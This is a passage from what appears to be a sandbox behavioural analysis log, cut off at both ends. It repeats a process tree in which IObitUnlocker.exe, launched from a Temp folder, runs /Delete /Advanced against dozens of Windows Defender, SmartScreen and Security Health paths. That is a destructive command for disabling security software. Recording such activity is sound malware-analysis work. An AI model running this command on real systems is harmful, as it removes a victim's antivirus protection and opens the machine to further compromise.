Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat 